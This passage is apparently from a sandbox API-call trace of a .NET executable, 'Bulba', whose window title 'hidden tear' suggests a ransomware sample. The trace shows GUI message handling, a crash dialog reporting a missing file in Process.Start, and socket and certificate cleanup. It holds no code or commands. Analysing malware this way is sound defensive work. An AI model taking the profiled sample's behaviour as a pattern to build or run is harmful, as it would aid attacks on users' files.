nSavedDC=-1) returned 1 [0058.647] GdipReleaseDC (graphics=0x4e4f360, hdc=0x7e010763) returned 0x0 [0058.647] GetFocus () returned 0x201e6 [0058.647] SystemParametersInfoW (in: uiAction=0x100a, uiParam=0x0, pvParam=0x3ade28, fWinIni=0x0 | out: pvParam=0x3ade28) returned 1 [0058.647] SendMessageW (hWnd=0x201ca, Msg=0x127, wParam=0x30001, lParam=0x0) returned 0x0 [0058.647] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x127, wParam=0x30001, lParam=0x0) returned 0x0 [0058.647] IsAppThemed () returned 0x1 [0058.647] GetThemeAppProperties () returned 0x3 [0058.647] GetThemeAppProperties () returned 0x3 [0058.647] GdipGetDC (graphics=0x4e4f360, hdc=0x3adf48) returned 0x0 [0058.647] BitBlt (hdc=0x4010840, x=0, y=0, cx=100, cy=23, hdcSrc=0x7e010763, x1=0, y1=0, rop=0xcc0020) returned 1 [0058.647] GdipReleaseDC (graphics=0x4e4f360, hdc=0x7e010763) returned 0x0 [0058.647] SelectPalette (hdc=0x4010840, hPal=0x188000b, bForceBkgd=0) returned 0xc0080824 [0058.647] SelectObject (hdc=0x7e010763, h=0x185000f) returned 0x3e050241 [0058.647] DeleteDC (hdc=0x7e010763) returned 1 [0058.647] GdipDeleteGraphics (graphics=0x4e4f360) returned 0x0 [0058.648] EndPaint (hWnd=0x201e6, lpPaint=0x3adeec) returned 1 [0058.648] MapWindowPoints (in: hWndFrom=0x201e6, hWndTo=0x0, lpPoints=0x246417c, cPoints=0x1 | out: lpPoints=0x246417c) returned 30933718 [0058.648] WindowFromPoint (Point=0x31a) returned 0x201e6 [0058.648] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201e6, Msg=0x84, wParam=0x0, lParam=0x1de031a) returned 0x1 [0058.648] NotifyWinEvent (event=0x800a, hwnd=0x201e6, idObject=-4, idChild=0) [0058.648] NotifyWinEvent (event=0x800c, hwnd=0x201e6, idObject=-4, idChild=0) [0058.648] GetCapture () returned 0x201e6 [0058.648] ReleaseCapture () returned 1 [0058.648] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201e6, Msg=0x215, wParam=0x0, lParam=0x0) returned 0x0 [0058.648] PeekMessageW (in: lpMsg=0x3ae6fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x3ae6fc) returned 1 [0058.648] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201e6, Msg=0x84, wParam=0x0, lParam=0x1de031a) returned 0x1 [0058.649] IsWindow (hWnd=0x301c4) returned 1 [0058.649] EnableWindow (hWnd=0x301c4, bEnable=1) returned 1 [0058.649] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301c4, Msg=0xa, wParam=0x1, lParam=0x0) returned 0x0 [0058.649] GetWindowLongW (hWnd=0x201ca, nIndex=-8) returned 0 [0058.649] IsWindow (hWnd=0x0) returned 0 [0058.649] IsWindow (hWnd=0x0) returned 0 [0058.649] IsWindow (hWnd=0x0) returned 0 [0058.649] GetFocus () returned 0x201e6 [0058.649] IsChild (hWndParent=0x201ca, hWnd=0x201e6) returned 1 [0058.649] ShowWindow (hWnd=0x201ca, nCmdShow=0) returned 1 [0058.649] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x18, wParam=0x0, lParam=0x0) returned 0x0 [0058.649] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x46, wParam=0x0, lParam=0x3ae6a0) returned 0x0 [0058.649] GetWindowPlacement (in: hWnd=0x201ca, lpwndpl=0x3ae450 | out: lpwndpl=0x3ae450) returned 1 [0058.649] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x47, wParam=0x0, lParam=0x3ae6a0) returned 0x0 [0058.650] GetClientRect (in: hWnd=0x201ca, lpRect=0x3ae400 | out: lpRect=0x3ae400) returned 1 [0058.650] GetWindowRect (in: hWnd=0x201ca, lpRect=0x3ae400 | out: lpRect=0x3ae400) returned 1 [0058.650] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x0 [0058.650] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x7f, wParam=0x0, lParam=0x0) returned 0x0 [0058.650] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x7f, wParam=0x1, lParam=0x0) returned 0x0 [0058.651] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x86, wParam=0x0, lParam=0x0) returned 0x1 [0058.651] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x0 [0058.651] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x7f, wParam=0x0, lParam=0x0) returned 0x0 [0058.651] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x7f, wParam=0x1, lParam=0x0) returned 0x0 [0058.652] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x1c, wParam=0x0, lParam=0x3b0) returned 0x0 [0058.652] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301be, Msg=0x1c, wParam=0x0, lParam=0x3b0) returned 0x0 [0058.652] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301c4, Msg=0x1c, wParam=0x0, lParam=0x3b0) returned 0x0 [0058.652] NtdllDefWindowProc_W () returned 0x0 [0058.652] GetFocus () returned 0x0 [0058.652] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201e6, Msg=0x8, wParam=0x0, lParam=0x0) returned 0x0 [0058.652] GetCapture () returned 0x0 [0058.652] InvalidateRect (hWnd=0x201e6, lpRect=0x0, bErase=0) returned 1 [0058.652] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201e6, Msg=0x281, wParam=0x0, lParam=0xc000000f) returned 0x0 [0058.652] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0058.652] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201e6, Msg=0x282, wParam=0x1, lParam=0x0) returned 0x0 [0058.653] GetWindowLongW (hWnd=0x201ca, nIndex=-20) returned 327945 [0058.653] DestroyWindow (hWnd=0x201ca) returned 1 [0058.653] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0058.661] GetWindowTextLengthW (hWnd=0x201ca) returned 24 [0058.661] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x18 [0058.661] GetSystemMetrics (nIndex=42) returned 0 [0058.661] GetWindowTextW (in: hWnd=0x201ca, lpString=0x3ae30c, nMaxCount=25 | out: lpString="Microsoft .NET Framework") returned 24 [0058.661] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0xd, wParam=0x19, lParam=0x3ae30c) returned 0x18 [0058.661] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0058.661] GetWindowTextLengthW (hWnd=0x201f2) returned 0 [0058.661] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201f2, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0 [0058.661] GetSystemMetrics (nIndex=42) returned 0 [0058.661] GetWindowTextW (in: hWnd=0x201f2, lpString=0x3ae340, nMaxCount=1 | out: lpString="") returned 0 [0058.661] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201f2, Msg=0xd, wParam=0x1, lParam=0x3ae340) returned 0x0 [0058.661] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201f2, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0058.662] GetWindowThreadProcessId (in: hWnd=0x201f8, lpdwProcessId=0x3ae3d0 | out: lpdwProcessId=0x3ae3d0) returned 0x974 [0058.662] GetWindow (hWnd=0x201f8, uCmd=0x5) returned 0x0 [0058.662] GetWindowLongW (hWnd=0x201f8, nIndex=-20) returned 65792 [0058.662] DestroyWindow (hWnd=0x201f8) returned 1 [0058.662] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201f8, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0058.662] GetWindowTextLengthW (hWnd=0x201f8) returned 25 [0058.662] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201f8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x19 [0058.662] GetSystemMetrics (nIndex=42) returned 0 [0058.662] GetWindowTextW (in: hWnd=0x201f8, lpString=0x3adf14, nMaxCount=26 | out: lpString="WindowsFormsParkingWindow") returned 25 [0058.662] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201f8, Msg=0xd, wParam=0x1a, lParam=0x3adf14) returned 0x19 [0058.662] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201f8, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0058.662] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201f8, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0058.663] GetWindowTextLengthW (hWnd=0x201f6) returned 245 [0058.663] CallWindowProcW (lpPrevWndFunc=0x73ceb8c9, hWnd=0x201f6, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xf5 [0058.663] GetSystemMetrics (nIndex=42) returned 0 [0058.663] GetWindowTextW (in: hWnd=0x201f6, lpString=0x3ae144, nMaxCount=246 | out: lpString="Unhandled exception has occurred in your application. If you click Continue, the application will ignore this error and attempt to continue. If you click Quit, the application will close immediately.\r\n\r\nThe system cannot find the file specified.") returned 245 [0058.663] CallWindowProcW (lpPrevWndFunc=0x73ceb8c9, hWnd=0x201f6, Msg=0xd, wParam=0xf6, lParam=0x3ae144) returned 0xf5 [0058.663] CallWindowProcW (lpPrevWndFunc=0x73ceb8c9, hWnd=0x201f6, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0058.663] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201f4, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0058.663] InvalidateRect (hWnd=0x201e6, lpRect=0x0, bErase=0) returned 1 [0058.663] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201e6, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0058.663] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201e8, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0058.663] SendMessageW (hWnd=0x201e2, Msg=0xb8, wParam=0x0, lParam=0x0) returned 0x0 [0058.663] CallWindowProcW (lpPrevWndFunc=0x73cd99d0, hWnd=0x201e2, Msg=0xb8, wParam=0x0, lParam=0x0) returned 0x0 [0058.664] SendMessageW (hWnd=0x201e2, Msg=0xb0, wParam=0x242b904, lParam=0x3ae3fc) returned 0x0 [0058.664] CallWindowProcW (lpPrevWndFunc=0x73cd99d0, hWnd=0x201e2, Msg=0xb0, wParam=0x242b904, lParam=0x3ae3fc) returned 0x0 [0058.664] GetWindowTextLengthW (hWnd=0x201e2) returned 3994 [0058.664] CallWindowProcW (lpPrevWndFunc=0x73cd99d0, hWnd=0x201e2, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xf9a [0058.664] GetSystemMetrics (nIndex=42) returned 0 [0058.664] CoTaskMemAlloc (cb=0x1f3a) returned 0x6e5dbd8 [0058.664] GetWindowTextW (in: hWnd=0x201e2, lpString=0x6e5dbd8, nMaxCount=3995 | out: lpString="See the end of this message for details on invoking \r\njust-in-time (JIT) debugging instead of this dialog box.\r\n\r\n************** Exception Text **************\r\nSystem.ComponentModel.Win32Exception (0x80004005): The system cannot find the file specified\r\n at System.Diagnostics.Process.StartWithShellExecuteEx(ProcessStartInfo startInfo)\r\n at System.Diagnostics.Process.Start()\r\n at System.Diagnostics.Process.Start(ProcessStartInfo startInfo)\r\n at System.Diagnostics.Process.Start(String fileName)\r\n at Bulba.Form1.startAction()\r\n at Bulba.Form1.Form1_Load(Object sender, EventArgs e)\r\n at System.Windows.Forms.Form.OnLoad(EventArgs e)\r\n at System.Windows.Forms.Form.OnCreateControl()\r\n at System.Windows.Forms.Control.CreateControl(Boolean fIgnoreVisible)\r\n at System.Windows.Forms.Control.CreateControl()\r\n at System.Windows.Forms.Control.WmShowWindow(Message& m)\r\n at System.Windows.Forms.Control.WndProc(Message& m)\r\n at System.Windows.Forms.ScrollableControl.WndProc(Message& m)\r\n at System.Windows.Forms.Form.WmShowWindow(Message& m)\r\n at System.Windows.Forms.Form.WndProc(Message& m)\r\n at System.Windows.Forms.Control.ControlNativeWindow.OnMessage(Message& m)\r\n at System.Windows.Forms.Control.ControlNativeWindow.WndProc(Message& m)\r\n at System.Windows.Forms.NativeWindow.Callback(IntPtr hWnd, Int32 msg, IntPtr wparam, IntPtr lparam)\r\n\r\n\r\n************** Loaded Assemblies **************\r\nmscorlib\r\n Assembly Version: 4.0.0.0\r\n Win32 Version: 4.6.81.0 built by: NETFXREL2\r\n CodeBase: file:///C:/Windows/Microsoft.NET/Framework/v4.0.30319/mscorlib.dll\r\n----------------------------------------\r\nBulba\r\n Assembly Version: 1.0.0.0\r\n Win32 Version: n/a\r\n CodeBase: file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/local.exe\r\n----------------------------------------\r\nSystem.Windows.Forms\r\n Assembly Version: 4.0.0.0\r\n Win32 Version: 4.6.81.0 built by: NETFXREL2\r\n CodeBase: file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/System.Windows.Forms/v4.0_4.0.0.0__b77a5c561934e089/System.Windows.Forms.dll\r\n----------------------------------------\r\nSystem\r\n Assembly Version: 4.0.0.0\r\n Win32 Version: 4.6.81.0 built by: NETFXREL2\r\n CodeBase: file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/System/v4.0_4.0.0.0__b77a5c561934e089/System.dll\r\n----------------------------------------\r\nSystem.Drawing\r\n Assembly Version: 4.0.0.0\r\n Win32 Version: 4.6.81.0 built by: NETFXREL2\r\n CodeBase: file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/System.Drawing/v4.0_4.0.0.0__b03f5f7f11d50a3a/System.Drawing.dll\r\n----------------------------------------\r\nSystem.Core\r\n Assembly Version: 4.0.0.0\r\n Win32 Version: 4.6.81.0 built by: NETFXREL2\r\n CodeBase: file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/System.Core/v4.0_4.0.0.0__b77a5c561934e089/System.Core.dll\r\n----------------------------------------\r\nSystem.Configuration\r\n Assembly Version: 4.0.0.0\r\n Win32 Version: 4.6.81.0 built by: NETFXREL2\r\n CodeBase: file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/System.Configuration/v4.0_4.0.0.0__b03f5f7f11d50a3a/System.Configuration.dll\r\n----------------------------------------\r\nSystem.Xml\r\n Assembly Version: 4.0.0.0\r\n Win32 Version: 4.6.81.0 built by: NETFXREL2\r\n CodeBase: file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/System.Xml/v4.0_4.0.0.0__b77a5c561934e089/System.Xml.dll\r\n----------------------------------------\r\n\r\n************** JIT Debugging **************\r\nTo enable just-in-time (JIT) debugging, the .config file for this\r\napplication or computer (machine.config) must have the\r\njitDebugging value set in the system.windows.forms section.\r\nThe application must also be compiled with debugging\r\nenabled.\r\n\r\nFor example:\r\n\r\n\r\n \r\n\r\n\r\nWhen JIT debugging is enabled, any unhandled exception\r\nwill be sent to the JIT debugger registered on the computer\r\nrather than be handled by this dialog box.\r\n\r\n\r\n") returned 3994 [0058.664] CallWindowProcW (lpPrevWndFunc=0x73cd99d0, hWnd=0x201e2, Msg=0xd, wParam=0xf9b, lParam=0x6e5dbd8) returned 0xf9a [0058.664] CoTaskMemFree (pv=0x6e5dbd8) [0058.664] CallWindowProcW (lpPrevWndFunc=0x73cd99d0, hWnd=0x201e2, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x1 [0058.664] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201f2, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0058.665] CallWindowProcW (lpPrevWndFunc=0x73ceb8c9, hWnd=0x201f6, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0058.665] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201f4, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0058.665] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201e6, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0058.666] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201e8, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0058.666] CallWindowProcW (lpPrevWndFunc=0x73cd99d0, hWnd=0x201e2, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0058.666] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0058.668] GetWindowTextLengthW (hWnd=0x301c4) returned 11 [0058.668] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xb [0058.668] GetSystemMetrics (nIndex=42) returned 0 [0058.668] GetWindowTextW (in: hWnd=0x301c4, lpString=0x3aea48, nMaxCount=12 | out: lpString="hidden tear") returned 11 [0058.668] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301c4, Msg=0xd, wParam=0xc, lParam=0x3aea48) returned 0xb [0058.668] PeekMessageW (in: lpMsg=0x3aec50, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x3aec50) returned 0 [0058.668] PeekMessageW (in: lpMsg=0x3aec50, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x3aec50) returned 0 [0058.668] WaitMessage () returned 1 [0058.738] PeekMessageW (in: lpMsg=0x3aec50, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x3aec50) returned 1 [0058.738] IsWindowUnicode (hWnd=0x201cc) returned 1 [0058.738] GetMessageW (in: lpMsg=0x3aec50, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x3aec50) returned 1 [0058.738] TranslateMessage (lpMsg=0x3aec50) returned 0 [0058.738] DispatchMessageW (lpMsg=0x3aec50) returned 0x0 [0058.738] PeekMessageW (in: lpMsg=0x3aec50, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x3aec50) returned 0 [0058.738] PeekMessageW (in: lpMsg=0x3aec50, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x3aec50) returned 0 [0058.738] WaitMessage () returned 1 [0058.956] PeekMessageW (in: lpMsg=0x3aec50, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x3aec50) returned 1 [0058.956] IsWindowUnicode (hWnd=0x401ea) returned 1 [0058.956] GetMessageW (in: lpMsg=0x3aec50, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x3aec50) returned 1 [0058.957] TranslateMessage (lpMsg=0x3aec50) returned 0 [0058.957] DispatchMessageW (lpMsg=0x3aec50) returned 0x0 [0058.957] PeekMessageW (in: lpMsg=0x3aec50, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x3aec50) returned 0 [0058.957] PeekMessageW (in: lpMsg=0x3aec50, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x3aec50) returned 0 [0058.957] WaitMessage () returned 1 [0065.774] PeekMessageW (in: lpMsg=0x3aec50, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x3aec50) returned 0 [0065.774] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301be, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0065.775] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301c4, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0065.775] NtdllDefWindowProc_W () returned 0x1 [0065.775] PeekMessageW (in: lpMsg=0x3aec50, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x3aec50) returned 0 [0065.775] WaitMessage () returned 1 [0073.325] PeekMessageW (in: lpMsg=0x3aec50, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x3aec50) returned 0 [0073.326] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301be, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0073.326] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301c4, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0073.326] NtdllDefWindowProc_W () returned 0x1 [0073.326] PeekMessageW (in: lpMsg=0x3aec50, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x3aec50) returned 0 [0073.327] WaitMessage () returned 1 [0073.338] PeekMessageW (in: lpMsg=0x3aec50, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x3aec50) returned 0 [0073.338] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301be, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0073.338] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301c4, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0073.338] NtdllDefWindowProc_W () returned 0x1 [0073.338] PeekMessageW (in: lpMsg=0x3aec50, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x3aec50) returned 0 [0073.338] WaitMessage () Thread: id = 2 os_tid = 0x980 Thread: id = 3 os_tid = 0x984 [0030.483] CoGetContextToken (in: pToken=0xe8f83c | out: pToken=0xe8f83c) returned 0x800401f0 [0030.483] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0056.279] CertFreeCRLContext (pCrlContext=0x488d98) returned 1 [0056.280] CloseHandle (hObject=0x270) returned 1 [0056.280] CloseHandle (hObject=0x5e8) returned 1 [0056.280] CloseHandle (hObject=0x3d0) returned 1 [0056.280] CloseHandle (hObject=0x3c8) returned 1 [0056.281] CertFreeCRLContext (pCrlContext=0x6b4f3c8) returned 1 [0056.281] CloseHandle (hObject=0x38c) returned 1 [0056.281] CloseHandle (hObject=0x388) returned 1 [0056.281] CertFreeCRLContext (pCrlContext=0x6b4f378) returned 1 [0056.282] CertFreeCRLContext (pCrlContext=0x488d98) returned 1 [0056.282] CloseHandle (hObject=0x2ac) returned 1 [0056.282] CloseHandle (hObject=0x2a8) returned 1 [0056.282] CloseHandle (hObject=0x3e4) returned 1 [0056.282] CloseHandle (hObject=0x2a4) returned 1 [0056.283] CloseHandle (hObject=0x5ec) returned 1 [0056.283] CloseHandle (hObject=0x2a0) returned 1 [0056.284] CloseHandle (hObject=0x268) returned 1 [0056.284] CloseHandle (hObject=0x29c) returned 1 [0056.284] CloseHandle (hObject=0x298) returned 1 [0056.284] CloseHandle (hObject=0x294) returned 1 [0056.285] CloseHandle (hObject=0x274) returned 1 [0056.285] CloseHandle (hObject=0x288) returned 1 [0056.285] CloseHandle (hObject=0x284) returned 1 [0056.285] CloseHandle (hObject=0x280) returned 1 [0056.285] CertCloseStore (hCertStore=0x417230, dwFlags=0x0) returned 1 [0056.285] CloseHandle (hObject=0x27c) returned 1 [0056.285] CloseHandle (hObject=0x278) returned 1 Thread: id = 4 os_tid = 0x988 Thread: id = 5 os_tid = 0x98c Thread: id = 6 os_tid = 0x990 Thread: id = 7 os_tid = 0xa48 Thread: id = 8 os_tid = 0xa4c Thread: id = 9 os_tid = 0xa50 Thread: id = 10 os_tid = 0xa54 [0044.665] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0044.667] ResetEvent (hEvent=0x28c) returned 1 [0156.976] QueryContextAttributesW (in: phContext=0x23f6318, ulAttribute=0x1a, pBuffer=0x6a7f524 | out: pBuffer=0x6a7f524) returned 0x0 [0156.980] DeleteSecurityContext (phContext=0x23f6318) returned 0x0 [0156.982] shutdown (s=0x3e8, how=2) returned 0 [0156.983] setsockopt (s=0x3e8, level=65535, optname=128, optval="\x01", optlen=4) returned 0 [0156.983] closesocket (s=0x3e8) returned 0 [0157.486] shutdown (s=0x278, how=2) returned 0 [0157.486] setsockopt (s=0x278, level=65535, optname=128, optval="\x01", optlen=4) returned 0 [0157.486] closesocket (s=0x278) returned 0 [0187.501] CoUninitialize () Thread: id = 11 os_tid = 0xa58 Thread: id = 12 os_tid = 0xa5c Thread: id = 13 os_tid = 0xa80 Thread: id = 14 os_tid = 0xabc Thread: id = 15 os_tid = 0x598 Thread: id = 16 os_tid = 0x410 Thread: id = 17 os_tid = 0x7f0